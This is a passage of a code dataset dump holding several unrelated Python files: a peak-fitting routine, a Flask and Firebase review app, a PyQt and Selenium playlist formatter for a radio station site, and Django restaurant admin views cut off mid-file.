# Plot each individual curve\r\n L = 0 + j * len(popt) / curveCnt # Sep popt array\r\n R = (j+1) * len(popt) / curveCnt \r\n\r\n finalParams.append(popt[L:R])\r\n \r\n if (savePath != None) and (filename != None): # Plot setup\r\n plt.plot(xData[domain], func(xData[domain], *guess[L:R]), \r\n '--', alpha=0.5, label='guessed curve: ' + str(j))\r\n plt.plot(xData[domain], func(xData[domain], *popt[L:R]), '.', alpha=0.5, \r\n label='opt. curve {:.0f} FWHM = {:.3f}'.format(j, FWHM[j]))\r\n \r\n # Finish plotting \r\n if (savePath != None) and (filename != None):\r\n plt.plot(xData[domain], yData[domain], marker='s', color='k', label='data')\r\n plt.plot(xData[domain], func(xData[domain], *popt), \r\n color='r', label='combined data')\r\n #plt.plot(xData[loc], yData[loc], marker='o', label='max point') # Max position\r\n plt.legend()\r\n\r\n plt.savefig(savePath + str(filename) + 'peakAt_' + \r\n '{:.3f}'.format(xData[loc]) + '.png')\r\n\r\n #plt.text(np.max(xData[domain]), np.max(yData[domain]), r'FWHM = {0}'.format())\r\n \r\n plt.close()\r\n \r\n print('Plot generated for peak at: {:.3f}'.format(xData[loc]))\r\n return finalParams, FWHM\r\n\r\n\r\ndef calcFWHM(data, LDatum, RDatum):\r\n '''\r\n Calculate full width half maximum literally\r\n Return list of peak location, FWHM, intensity\r\n '''\r\n\r\n roots = []\r\n # Convert left and right bounds to integers for indexing\r\n LDat = int(LDatum)\r\n RDat = int(RDatum)\r\n domain = np.arange(LDat, RDat)\r\n \r\n # Separate x and y data series\r\n xData = data[0]\r\n yData = data[1]\r\n \r\n\r\n # Locate position of max in domain \r\n maxInd = np.where(yData[domain] == np.max(yData[domain]))[0][0]\r\n # Shift according to LDat since data is complete \r\n loc = int(LDat + maxInd) # given all data\r\n\r\n # If not enough points to fit spline, return 'N/A' \r\n if len(xData[domain]) < 5:\r\n return [xData[loc], 'N/A']\r\n\r\n #offset to 0 \r\n yDataOffset = yData - np.min(yData[domain]) \r\n yRange = np.max(yDataOffset[domain])\r\n spline = UnivariateSpline(xData[domain], yDataOffset[domain] - yRange/2)\r\n \r\n roots = spline.roots()\r\n \r\n if len(roots) >= 2: \r\n return [xData[loc], (np.max(roots) - np.min(roots[0])), np.max(yData[domain])]\r\n else: \r\n print('number of roots ({0}) < 2, at y={1}'.format(len(roots), yRange/2))\r\n print(roots)\r\n return [xData[loc], 'N/A', np.max(yData[domain])]\r\n","sub_path":"peakFitResidIter2.py","file_name":"peakFitResidIter2.py","file_ext":"py","file_size_in_byte":10038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"251824591","text":"from flask import Flask, render_template\nfrom firebase import firebase\nfrom firebase_admin import db\nfrom flask import request\n\n#\"{{ url_for('handle_data') }}\" //instead of typing out entire url\n\nFBConn = firebase.FirebaseApplication('https://howitrate-user-db-default-rtdb.firebaseio.com/', None)\n\napp = Flask(__name__)\n\ncategories = []\n\napp.static_folder = 'static'\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/', methods=['POST'])\ndef result():\n category = request.form.get('catName')\n\n data_to_upload = {\n 'Category' : category\n }\n\n result = FBConn.post('/MyTestData/', data_to_upload)\n\n return render_template(\"index.html\",result=category)\n\n'''@app.route('/addreview', methods=['POST'])\ndef addreview():\n review = request.form['Review']\n\n data_to_upload = {\n 'Review' : review\n }\n\n result = FBConn.post('/Reviews/', data_to_upload)'''\n\n@app.route('/categories', methods=['POST'])\ndef categories():\n\n #Getting data from database\n cats = FBConn.get('https://howitrate-user-db-default-rtdb.firebaseio.com/MyTestData', '')\n\n cat = []\n\n #looping over dictionary to get categories and put in list\n for i in cats:\n cat.append(cats.get(i).get('Category'))\n\n print(cat)\n\n cat = set(cat)\n cat = sorted(cat)\n\n return render_template(\"categories.html\", result=cat)\n\n #return 'Click.'\n\n#where coffee reviews are\n@app.route('/coffeereviews', methods=['POST'])\ndef coffeereviews():\n\n #Get anbd display reviews\n reviews = FBConn.get('https://howitrate-user-db-default-rtdb.firebaseio.com/Reviews', '')\n\n reviews_l = []\n\n for i in reviews:\n reviews_l.append(reviews.get(i).get('Review').get('review'))\n #print(reviews_l)\n\n return render_template(\"coffeereviews.html\", result=reviews_l)\n\n#where to go to post review about coffee\n@app.route('/coffee', methods=['POST'])\ndef coffee():\n\n #whenever coffee button is pressed it is added to database, have to fix\n\n #Retrieve Review\n rev = request.form\n\n if (rev.get('form') != 'coffee'):\n data_to_upload = {\n 'Review' : rev\n }\n FBConn.post('/Reviews/', data_to_upload)\n\n\n\n return render_template(\"coffee.html\")\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n\n'''
\n

\n
'''\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#bottom\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"185341766","text":"\"\"\"\nPlaylist Formatter Tool\nAkseli Lukkarila\n2018\n\"\"\"\nimport csv\nimport os\nimport sys\nimport time\nimport platform\n\nfrom datetime import datetime, timedelta\nfrom timeit import default_timer as timer\n\nimport colorama\nimport openpyxl\nimport requests\nfrom titlecase import titlecase\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select, WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nfrom PyQt5.Qt import PYQT_VERSION_STR, QSizePolicy\nfrom PyQt5.QtCore import Qt, QT_VERSION_STR\nfrom PyQt5.QtGui import QIcon, QColor, QPalette, QKeySequence, QFont\nfrom PyQt5.QtWidgets import (QApplication, QWidget, QFileDialog, QStyle, QTreeWidgetItem, QHeaderView,\n QMainWindow, QMenuBar, QAbstractItemView, QGridLayout, QAction, QMessageBox,\n QDesktopWidget, QPushButton, QListWidget, QFontDialog, QLineEdit, QLabel, QTreeWidget)\n\n# ==================================================================================\n\nclass PlaylistFormatter:\n \"\"\"Reads a playlist textfile and creates correctly formatted csv or excel\"\"\"\n def __init__(self):\n self.playlistFile = None\n self.playlistDate = None\n self.playlistName = \"\"\n self.filepath = \"\"\n self.filename = \"\"\n self.filetype = \"\"\n self.playlist = []\n self.driver = None\n if platform.system().lower() == \"darwin\": # MacOS\n self.driverPath = \"/Users/Dropbox/CODE/webdriver/chromedriver\"\n else:\n self.driverPath = \"D:/Dropbox/CODE/webdriver/chromedriver.exe\"\n\n # ------------------------------------------------------------------------------\n\n def readPlaylist(self, filename):\n if not os.path.isfile(filename):\n raise RuntimeError(\"File does not exist.\")\n \n print(\"reading playlist {}\\n\".format(getColor(filename, colorama.Fore.YELLOW)))\n self.filepath, self.filename = os.path.split(filename)\n self.filename, self.filetype = os.path.splitext(self.filename)\n self.filetype = self.filetype.strip().lower()\n if self.filetype == \".csv\":\n self._readCSV(filename)\n\n elif self.filetype == \".txt\":\n self._readTXT(filename)\n\n elif self.filetype in (\".xlsx\", \".xlsm\", \".xltx\", \".xltm\"):\n self._readXLS(filename)\n\n else:\n raise RuntimeError(\"Unsupported filetype \\\"{}\\\".\".format(self.filetype))\n\n self.printPlaylist()\n\n # ------------------------------------------------------------------------------\n\n def _readCSV(self, filename):\n try:\n with open(filename) as csvFile:\n playlistData = csv.DictReader(csvFile)\n\n previousTime = timedelta()\n playlist = []\n playlistIndex = 0\n for index, rowData in enumerate(playlistData):\n if index == 0:\n self.playlistName = rowData[\"name\"]\n self.playlistDate = rowData[\"start time\"].split(\",\")[0]\n continue\n\n timeString = rowData[\"start time\"].replace(\".\", \":\").strip().split(\" \")[0]\n rowData[\"start time\"] = datetime.strptime(timeString, \"%H:%M:%S\")\n\n if index == 1:\n startTime = rowData[\"start time\"]\n\n title = rowData[\"name\"]\n if \" - \" in title:\n title = title.replace(\" - \", \" (\") + \")\"\n\n title = title.replace(\"(Clean)\", \"\").replace(\"(clean)\", \"\")\n title = title.replace(\"(Dirty)\", \"\").replace(\"(dirty)\", \"\")\n title = title.replace(\"(Original Mix)\", \"\").replace(\"(original Mix)\", \"\")\n title = title.replace(\"(Dirty-\", \"(\").replace(\"(dirty-\", \"(\")\n title = title.replace(\"(Clean-\", \"(\").replace(\"(clean-\", \"(\")\n title = title.replace(\" )\", \")\")\n title = title.replace(\"( \", \"(\")\n\n # split at all whitespace chars and recombine -> remove extra spaces and linebreaks...\n title = \" \".join(title.split())\n\n playTime = rowData[\"start time\"] - startTime\n songData = {\"artist\": titlecase(rowData[\"artist\"]), \n \"song\": titlecase(title),\n \"time\": playTime,\n \"playtime\": playTime - previousTime,\n \"starttime\": rowData[\"start time\"]}\n\n if songData[\"playtime\"] < timedelta(seconds=60):\n songData[\"playtime\"] = timedelta(seconds=60)\n\n # sum duplicate song playtimes\n if playlistIndex and playlist[playlistIndex-1][\"song\"] == songData[\"song\"] and playlist[playlistIndex-1][\"artist\"] == songData[\"artist\"]:\n playlist[playlistIndex-1][\"playtime\"] += songData[\"playtime\"]\n\n else:\n playlist.append(songData)\n playlistIndex += 1\n previousTime = playTime\n\n for i in range(1, len(playlist)):\n playlist[i-1][\"playtime\"] = playlist[i][\"playtime\"]\n\n self.playlist = playlist\n self.playlistFile = filename\n\n except Exception:\n errorType, errorValue, _ = sys.exc_info()\n raise RuntimeError(\"Error reading CSV:\\n{}: {}\".format(str(errorType), str(errorValue)))\n\n # ------------------------------------------------------------------------------\n\n def _readXLS(self, filename):\n # TODO\n pass\n\n # ------------------------------------------------------------------------------\n\n def _readTXT(self, filename):\n # TODO\n pass\n\n # ------------------------------------------------------------------------------\n\n def exportCSV(self, filename = None):\n if not self.playlist:\n raise RuntimeError(\"No playlist. Read a playlist first!\")\n\n outFilename = filename if filename else self.filename\n if not outFilename.endswith(\".csv\"):\n outFilename += \".csv\"\n\n outFile = os.path.join(self.filepath, outFilename)\n with open(outFile, \"w\", newline = \"\") as csvFile:\n csvWriter = csv.writer(csvFile, delimiter = \",\")\n csvWriter.writerow([\"Artist\", \"\", \"Song\", \"Time\", \"Playtime\", \"Start time\"])\n for row in self.playlist:\n csvWriter.writerow([row[\"artist\"],\n \"-\",\n row[\"song\"],\n str(row[\"time\"]).split(\", \")[-1],\n str(row[\"playtime\"]).split(\", \")[-1],\n row[\"starttime\"].strftime(\"%H:%M:%S\")])\n\n # ------------------------------------------------------------------------------\n\n def printPlaylist(self):\n if not self.playlist:\n raise RuntimeError(\"No playlist. Read a playlist first!\")\n\n widthArtist = max(len(row[\"artist\"]) for row in self.playlist)\n widthTitle = max(len(row[\"song\"]) for row in self.playlist)\n heading = \"{:<{widthArtist}s} {:<{widthTitle}s} {:9s} {:9s} {:9s}\".format(\n \"ARTIST\", \n \"SONG\", \n \"TIME\", \n \"PLAYTIME\",\n \"STARTTIME\", \n widthArtist = widthArtist + 2, \n widthTitle = widthTitle)\n printBold(heading)\n printColor(\"\".join([\"-\"] * len(heading)), colorama.Fore.LIGHTBLACK_EX)\n\n for row in self.playlist:\n print(\"{:<{widthArtist}s} - {:<{widthTitle}s} {} {} {}\".format(\n row[\"artist\"], \n row[\"song\"],\n colorama.Fore.YELLOW + str(row[\"time\"]).split(\", \")[-1],\n colorama.Fore.GREEN + str(row[\"playtime\"]).split(\", \")[-1], \n colorama.Fore.BLUE + row[\"starttime\"].strftime(\"%H:%M:%S\"), \n widthArtist = widthArtist,\n widthTitle = widthTitle) + \n colorama.Style.RESET_ALL) \n\n printColor(\"\".join([\"-\"] * len(heading)) + \"\\n\", colorama.Fore.LIGHTBLACK_EX)\n\n # ------------------------------------------------------------------------------\n\n def formatPlaylist(self):\n \"\"\"\n Return formatted playlist for printing.\n Returns (str): list of formatted song strings\n \"\"\"\n playlist = []\n if not self.playlist:\n raise RuntimeError(\"No playlist. Read a playlist first!\")\n\n widthArtist = max(len(row[\"artist\"]) for row in self.playlist)\n widthTitle = max(len(row[\"song\"]) for row in self.playlist)\n\n for row in self.playlist:\n playlist.append(\"{:<{widthArtist}s} - {:<{widthTitle}s} {}\".format(\n row[\"artist\"],\n row[\"song\"],\n str(row[\"time\"]).split(\", \")[-1],\n widthArtist = widthArtist,\n widthTitle = widthTitle))\n\n return playlist\n\n # ------------------------------------------------------------------------------\n\n def fillBasso(self, show, startIndex = 0):\n \"\"\"Fill radioshow playlist to Bassoradio database using Selenium\"\"\"\n printBold(\"Uploading playlist to dj.basso.fi...\", colorama.Fore.RED)\n startTime = timer()\n\n if len(self.playlist) <= startIndex:\n print(\"Index not valid.\")\n return\n\n self.openBassoDriver(show)\n\n print(\"\\nFilling playlist for show:\")\n printColor(show, colorama.Fore.CYAN)\n\n # input song data\n printColor(\"\\nAdding songs...\", colorama.Fore.MAGENTA)\n for index, row in enumerate(self.playlist[startIndex:]):\n inputIndex = 0\n print(\" {:d}: {:s} - {:s}\".format(index + 1, row[\"artist\"], row[\"song\"]))\n while True:\n # increase index so we don't send the first letter multiple times when trying again\n inputIndex += 1\n try:\n time.sleep(0.5)\n findTrack = WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.ID, \"find-track-textfield\")))\n findTrack.send_keys(row[\"artist\"][:inputIndex])\n\n WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.ID, \"new-track-entry-form\")))\n\n artist = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable((By.CSS_SELECTOR, \"[ng-model*='newTrack.artist']\")))\n time.sleep(0.5)\n artist.send_keys(row[\"artist\"][inputIndex:])\n\n song = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable((By.CSS_SELECTOR, \"[ng-model*='newTrack.title']\")))\n song.send_keys(row[\"song\"])\n\n mins = row[\"playtime\"].seconds // 60\n minutes = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable((By.CSS_SELECTOR, \"[ng-model*='newTrack.minutes']\")))\n minutes.send_keys(mins)\n\n secs = row[\"playtime\"].seconds % 60\n seconds = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable((By.CSS_SELECTOR, \"[ng-model*='newTrack.seconds']\")))\n seconds.send_keys(secs)\n\n save = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable((By.XPATH, \"//input[@type='button' and @value='Tallenna uusi biisi']\")))\n save.click()\n\n submitButton = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable((By.XPATH, \"//input[@type='submit' and @value='Lisää biisilistaan']\")))\n submitButton.click()\n\n except Exception as e:\n printColor(str(e), colorama.Fore.RED)\n continue\n else:\n break\n\n printColor(\"Done in {:.2f} seconds!\".format(timer() - startTime), colorama.Fore.GREEN)\n\n # ------------------------------------------------------------------------------\n\n def openBassoDriver(self, show):\n if not self.driver:\n # open webdriver if not already open\n self.driver = webdriver.Chrome(executable_path = self.driverPath)\n\n self.driver.get(\"Basso website here...\")\n\n # clear current show\n self.driver.find_element_by_id(\"broadcast-title-clear\").click()\n\n # select correct show\n select = Select(self.driver.find_element_by_css_selector(\"[ng-model*='play.broadcast']\"))\n select.select_by_visible_text(show)\n\n # ------------------------------------------------------------------------------\n\n def getShowString(self, date, showName):\n return \"{} 20:00-22:00 LIVE {}\".format(date, showName)\n\n\n# ==================================================================================\n\nclass PlaylistTool(QMainWindow):\n def __init__(self):\n super().__init__()\n\n self.formatter = PlaylistFormatter()\n if platform.system().lower() == \"darwin\": # MacOS\n self.defaultPath = os.path.expanduser(\"~/Dropbox\")\n else:\n self.defaultPath = 'D:/Dropbox'\n\n self.initUI()\n\n # ------------------------------------------------------------------------------\n\n def initUI(self):\n self.setWindowTitle(\"Esgrove's Playlist Tool\")\n self.setWindowIcon(self.style().standardIcon(QStyle.SP_MediaPlay))\n self.setAcceptDrops(True)\n\n # geometry\n self.setGeometry(0, 0, 1000, 800)\n self.setMinimumSize(500, 500)\n qtRectangle = self.frameGeometry()\n qtRectangle.moveCenter(QDesktopWidget().availableGeometry().center())\n self.move(qtRectangle.topLeft())\n\n # menubar\n self.menubar = self.menuBar()\n self.fileMenu = self.menubar.addMenu('&File')\n self.viewMenu = self.menubar.addMenu('&View')\n self.helpMenu = self.menubar.addMenu('&Help')\n self.statusbar = self.statusBar()\n\n # menu actions\n self.exitAct = QAction(self.style().standardIcon(QStyle.SP_MessageBoxCritical), '&Exit', self) \n self.exitAct.setShortcut(\"Escape\") # Ctrl+Q\n self.exitAct.setStatusTip('Exit application')\n self.exitAct.triggered.connect(self.closeEvent)\n self.fileMenu.addAction(self.exitAct)\n\n self.aboutAct = QAction(self.style().standardIcon(QStyle.SP_MessageBoxQuestion), '&About', self) \n self.aboutAct.setShortcut(\"Ctrl+I\")\n self.aboutAct.setStatusTip('About this application')\n self.aboutAct.triggered.connect(self.aboutEvent)\n self.helpMenu.addAction(self.aboutAct)\n\n self.fontAct = QAction(\"&Choose Font\", self)\n self.fontAct.triggered.connect(self.chooseFont)\n self.viewMenu.addAction(self.fontAct)\n\n # buttons\n self.openButton = QPushButton('Open playlist', self)\n self.openButton.setToolTip('Open playlist filedialog')\n self.openButton.clicked.connect(self.openPlaylist)\n self.openButton.setStyleSheet(\"QPushButton { font: bold 16px; height: 50px; }\")\n\n self.exportButton = QPushButton('Save playlist', self)\n self.exportButton.setToolTip('Export playlist to file')\n self.exportButton.clicked.connect(self.exportPlaylist)\n self.exportButton.setStyleSheet(\"QPushButton { font: bold 16px; height: 50px; }\")\n\n self.bassoButton = QPushButton('Upload to Basso', self)\n self.bassoButton.setToolTip('Fill playlist to dj.Basso.fi')\n self.bassoButton.clicked.connect(self.fillBasso)\n self.bassoButton.setStyleSheet(\"QPushButton { font: bold 16px; height: 50px; }\")\n\n # line edits\n self.playlistNameLabel = QLabel(\"Playlist Name\")\n self.playlistDateLabel = QLabel(\"Playlist Date\")\n self.playlistFileLabel = QLabel(\"Playlist File\")\n self.playlistNameEdit = QLineEdit()\n self.playlistDateEdit = QLineEdit()\n self.playlistFileEdit = QLineEdit()\n self.playlistFileEdit.setReadOnly(True)\n\n # list view\n self.list = QTreeWidget()\n self.list.setFont(QFont('Consolas', 9))\n self.list.setStyleSheet(\"QTreeView::item { margin: 2px; }\") # QTreeWidget { border-radius: 2px; border-style: outset; border-width: 2px; }\n self.list.setAlternatingRowColors(True)\n self.list.setAcceptDrops(True)\n self.list.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Expanding)\n self.list.setDragDropMode(QAbstractItemView.InternalMove)\n self.list.setDropIndicatorShown(True)\n self.list.setSelectionBehavior(QAbstractItemView.SelectRows)\n self.list.setSelectionMode(QAbstractItemView.SingleSelection)\n self.list.setColumnCount(4)\n self.list.setHeaderLabels((\"index\", \"artist\", \"song\", \"playtime\"))\n self.list.header().setStretchLastSection(False)\n self.list.header().setSectionResizeMode(2, QHeaderView.Stretch)\n self.list.setColumnWidth(0, 50)\n self.list.setColumnWidth(1, 500)\n self.list.setColumnWidth(3, 100)\n\n # grid\n self.mainGrid = QGridLayout()\n self.mainGrid.setSpacing(10)\n self.mainGrid.addWidget(self.openButton, 0, 0, 1, 2, Qt.AlignTop)\n self.mainGrid.addWidget(self.exportButton, 0, 2, 1, 2, Qt.AlignTop)\n self.mainGrid.addWidget(self.bassoButton, 0, 4, 1, 2, Qt.AlignTop)\n self.mainGrid.addWidget(self.playlistFileLabel, 1, 0, 1, 1, Qt.AlignRight)\n self.mainGrid.addWidget(self.playlistFileEdit, 1, 1, 1, 5, Qt.AlignTop)\n self.mainGrid.addWidget(self.playlistNameLabel, 2, 0, 1, 1, Qt.AlignRight)\n self.mainGrid.addWidget(self.playlistNameEdit, 2, 1, 1, 2, Qt.AlignTop)\n self.mainGrid.addWidget(self.playlistDateLabel, 2, 3, 1, 1, Qt.AlignRight)\n self.mainGrid.addWidget(self.playlistDateEdit, 2, 4, 1, 2, Qt.AlignTop)\n self.mainGrid.addWidget(self.list, 3, 0, 1, 6)\n\n # main widget\n self.mainWidget = QWidget()\n self.mainWidget.setLayout(self.mainGrid)\n self.setCentralWidget(self.mainWidget)\n\n # ------------------------------------------------------------------------------\n\n def dragEnterEvent(self, event):\n if event.mimeData().hasUrls():\n event.accept()\n else:\n event.ignore()\n\n # ------------------------------------------------------------------------------\n \n def dragMoveEvent(self, event):\n if event.mimeData().hasUrls():\n event.setDropAction(Qt.CopyAction)\n event.accept()\n else:\n event.ignore()\n \n # ------------------------------------------------------------------------------\n \n def dropEvent(self, event):\n filename = str(event.mimeData().urls()[0].toLocalFile())\n self.addPlaylist(filename)\n\n # ------------------------------------------------------------------------------\n \n def openPlaylist(self, event):\n filename, _ = QFileDialog.getOpenFileName(self, 'Open playlist', self.defaultPath, \"Files (*.csv *.txt *.xlsx *.xlsm)\")\n if filename:\n self.addPlaylist(filename)\n \n # ------------------------------------------------------------------------------\n \n def addPlaylist(self, filename):\n self.formatter.readPlaylist(filename)\n for index, row in enumerate(self.formatter.playlist):\n self.list.addTopLevelItem(QTreeWidgetItem((str(index + 1), row[\"artist\"], row[\"song\"], str(row[\"playtime\"]).split(\", \")[-1])))\n \n self.playlistFileEdit.setText(str(self.formatter.playlistFile))\n self.playlistNameEdit.setText(str(self.formatter.playlistName))\n self.playlistDateEdit.setText(str(self.formatter.playlistDate))\n self.statusbar.showMessage(\"Loaded playlist: {}\".format(filename), 5000)\n\n # ------------------------------------------------------------------------------\n \n def exportPlaylist(self, event):\n filename, _ = QFileDialog.getSaveFileName(self, 'Save playlist', self.defaultPath + os.sep + self.playlistNameEdit.text())\n if filename:\n if filename.endswith(\".csv\"):\n self.formatter.exportCSV(filename)\n\n elif filename.endswith(\".txt\"):\n printColor(\"txt export not implemented yet!\", colorama.Fore.RED)\n return\n\n elif filename.endswith(\".xlsx\"):\n printColor(\"Excel export not implemented yet!\", colorama.Fore.RED)\n return\n\n else:\n self.formatter.exportCSV(filename)\n\n self.statusbar.showMessage(\"Saved playlist as: {}\".format(filename), 5000) \n\n # ------------------------------------------------------------------------------\n \n def fillBasso(self, event):\n self.formatter.fillBasso(\"Ruff Cut\", self.playlistDateEdit.text())\n\n # ------------------------------------------------------------------------------\n \n def chooseFont(self, event):\n font, ok = QFontDialog.getFont()\n if ok:\n self.list.setFont(font)\n\n # ------------------------------------------------------------------------------\n \n def closeEvent(self, event):\n app.quit()\n\n # ------------------------------------------------------------------------------\n \n def aboutEvent(self, event):\n QMessageBox.about(self, \"About\", \"Playlist Tools\\nAkseli Lukkarila\\n2018\\n\\n\" + \n \"Python {:} QT {:} PyQT {:}\".format(sys.version.split(\" \")[0], \n QT_VERSION_STR, \n PYQT_VERSION_STR))\n\n\n# ==================================================================================\n\ndef printBold(text, color = colorama.Fore.WHITE):\n print(colorama.Style.BRIGHT + color + text + colorama.Style.RESET_ALL)\n\n# ==================================================================================\n\ndef printColor(text, color = colorama.Fore.WHITE):\n print(color + text + colorama.Style.RESET_ALL)\n\n# ==================================================================================\n\ndef getColor(text, color = colorama.Fore.WHITE):\n return color + text + colorama.Style.RESET_ALL\n\n# ==================================================================================\n\nif __name__ == \"__main__\":\n colorama.init()\n if len(sys.argv) > 1:\n # arguments given, run on command line\n printBold(\"\\n///// PLAYLIST FORMATTER /////\\n\", colorama.Fore.RED)\n filename = sys.argv[1]\n outfile = sys.argv[2] if len(sys.argv) == 2 else filename\n\n formatter = PlaylistFormatter()\n formatter.readPlaylist(filename)\n formatter.printPlaylist()\n\n print(\"exporting formatted playlist to:\")\n printColor(outfile, colorama.Fore.YELLOW)\n formatter.exportCSV(outfile)\n\n printBold(\"\\n/////////// DONE ////////////\\n\", colorama.Fore.GREEN)\n\n else: # open GUI\n app = QApplication(sys.argv)\n app.setStyle('Fusion')\n\n # colors\n palette = QPalette()\n palette.setColor(QPalette.Window, QColor(205,0,0))\n palette.setColor(QPalette.WindowText, Qt.white)\n palette.setColor(QPalette.Base, QColor(15,15,15))\n palette.setColor(QPalette.AlternateBase, QColor(53,53,53))\n palette.setColor(QPalette.ToolTipBase, Qt.white)\n palette.setColor(QPalette.ToolTipText, Qt.white)\n palette.setColor(QPalette.Text, Qt.white)\n palette.setColor(QPalette.Button, QColor(53,53,53))\n palette.setColor(QPalette.ButtonText, Qt.white)\n palette.setColor(QPalette.BrightText, Qt.red)\n palette.setColor(QPalette.Highlight, QColor(205,205,205).lighter())\n palette.setColor(QPalette.HighlightedText, Qt.black)\n app.setPalette(palette)\n\n # run tool\n tool = PlaylistTool()\n tool.show()\n\n # wait for exit\n sys.exit(app.exec_())\n","sub_path":"PlaylistFormatter.py","file_name":"PlaylistFormatter.py","file_ext":"py","file_size_in_byte":24320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"577229974","text":"from django.shortcuts import render, redirect\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView, ModelFormMixin\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.list import ListView\nfrom django.views.generic import FormView,TemplateView\nfrom . import models\nfrom . import forms\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse , reverse_lazy\nfrom django.contrib import messages\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.contrib.auth.forms import PasswordChangeForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom django.views import View\n\n\n\n# Create your views here.\n@login_required\ndef change_password(request):\n if request.method == 'POST':\n form =PasswordChangeForm(request.user, request.POST)\n if form.is_valid():\n\n user = form.save()\n update_session_auth_hash(request, user) # Important!\n messages.success(request, 'Your password was successfully updated!')\n return redirect('restaurant_admin:login')\n else:\n messages.error(request, 'Please correct the error below.')\n else:\n form = PasswordChangeForm(request.user)\n print(form.error_messages)\n\n return render(request, 'restaurant_admin/change_password.html', {\n 'form': form\n })\n\ndef index(request):\n my_dict = {'insert_me': 'HELLO I AM FROM VIEWS.PY OF RESTAURANT_ADMIN !'}\n return render(request, 'restaurant_admin/index.html', context=my_dict)\n\n@login_required\ndef Home(request):\n return render(request,'restaurant_admin/home.html')\n\n@method_decorator(login_required, name='dispatch')\nclass FoodCategoryCreateView(CreateView):\n template_name = 'restaurant_admin/FoodCategorycreate.html'\n model = models.FoodCategory\n fields = '__all__'\n\n@method_decorator(login_required, name='dispatch')\nclass FoodCategoryUpdateView(UpdateView):\n template_name = 'restaurant_admin/FoodCategoryupdate.html'\n model = models.FoodCategory\n fields = '__all__'\n\n@method_decorator(login_required, name='dispatch')\nclass FoodCategoryDetailView(DetailView):\n template_name = 'restaurant_admin/FoodCategorydetail.html'\n model = models.FoodCategory\n fields = '__all__'\n\n'''\n@method_decorator(login_required, name='dispatch')\nclass FoodCategoryHomeDetailView(FormView, ListView):\n template_name = 'restaurant_admin/FoodCategoryHomedetail.html'\n form_class = forms.InputForm\n model = models.FoodCategory\n fields='__all__\n'''\n@method_decorator(login_required, name='dispatch')\nclass FoodCategoryHomeDetailView(View):\n template_name = 'restaurant_admin/FoodCategoryHomedetail.html'\n #form_class = forms.InputForm\n model = models.FoodCategory\n fields='__all__'\n chosen_object=None\n update_form=None\n queryset= models.FoodCategory.objects.all()\n\n def get(self,*args,**kwargs):\n self.queryset=self.model.objects.all()\n return render(self.request, 'restaurant_admin/FoodCategoryHomedetail.html',context={'object_list':self.queryset,\n 'chosen_object': self.chosen_object,\n 'update_form': self.update_form})\n def post(self,*args,**kwargs):\n postvalues = self.request.POST\n print(postvalues)\n if postvalues.get('foodcategory_id', None):\n id = self.request.POST.get('foodcategory_id')\n self.chosen_object= self.model.objects.get(pk=id)\n #print(self.chosen_object.name)\n\n if self.chosen_object != None:\n self.update_form=forms.FoodCategoryForm(instance=self.chosen_object)\n\n if postvalues.get('edit',None):\n self.chosen_object=self.model.objects.get(pk=postvalues['pk'])\n self.update_form=forms.FoodCategoryForm(self.request.POST,instance=self.chosen_object)\n if self.update_form.is_valid():\n foodcategory=self.update_form.save()\n print('yesk')\n foodcategory.save()\n self.queryset= models.FoodCategory.objects.all()\n self.chosen_object=self.model.objects.get(pk=foodcategory.pk)\n self.update_form=forms.FoodCategoryForm(instance=self.chosen_object)\n\n return render(self.request,'restaurant_admin/FoodCategoryHomedetail.html',context={'object_list':self.queryset,\n 'chosen_object': self.chosen_object,\n 'update_form': self.update_form})\n\n\n\n@method_decorator(login_required, name='dispatch')\nclass FoodCategoryDeleteView(DeleteView):\n template_name = 'restaurant_admin/FoodCategorydelete.html'\n model = models.FoodCategory\n fields = '__all__'\n\n def get(self, *args, **kwargs):\n return self.post(*args, **kwargs)\n\n def get_success_url(self):\n return reverse('restaurant_admin:FoodCategoryHome_detail')\n\n@method_decorator(login_required, name='dispatch')\nclass FoodCategoryListView(ListView):\n template_name = 'restaurant_admin/FoodCategorylist.html'\n model = models.FoodCategory\n fields = '__all__'\n\n@method_decorator(login_required, name='dispatch')\nclass FoodCreateView(CreateView):\n\n model = models.Food\n fields = '__all__'\n template_name = 'restaurant_admin/Foodcreate.html'\n\n def form_valid(self, form):\n food_category = form.cleaned_data['food_category']\n food = form.save(commit=False)\n food.food_category= food_category\n food.save()\n return super(FoodCreateView, self).form_valid(form)\n\n@method_decorator(login_required, name='dispatch')\nclass FoodUpdateView(UpdateView):\n\n model = models.Food\n fields = '__all__'\n template_name = 'restaurant_admin/Foodupdate.html'\n\n def form_valid(self, form):\n food_category = form.cleaned_data['food_category']\n food = form.save(commit=False)\n food.food_category= food_category\n food.save()\n return super(FoodUpdateView, self).form_valid(form)\n\n@method_decorator(login_required, name='dispatch')\nclass FoodDetailView(DetailView):\n template_name = 'restaurant_admin/Fooddetail.html'\n model = models.Food\n fields = '__all__'\n'''\n@method_decorator(login_required, name='dispatch')\nclass FoodHomeDetailView(FormView, ListView):\n template_name = 'restaurant_admin/FoodHomedetail.html'\n form_class = 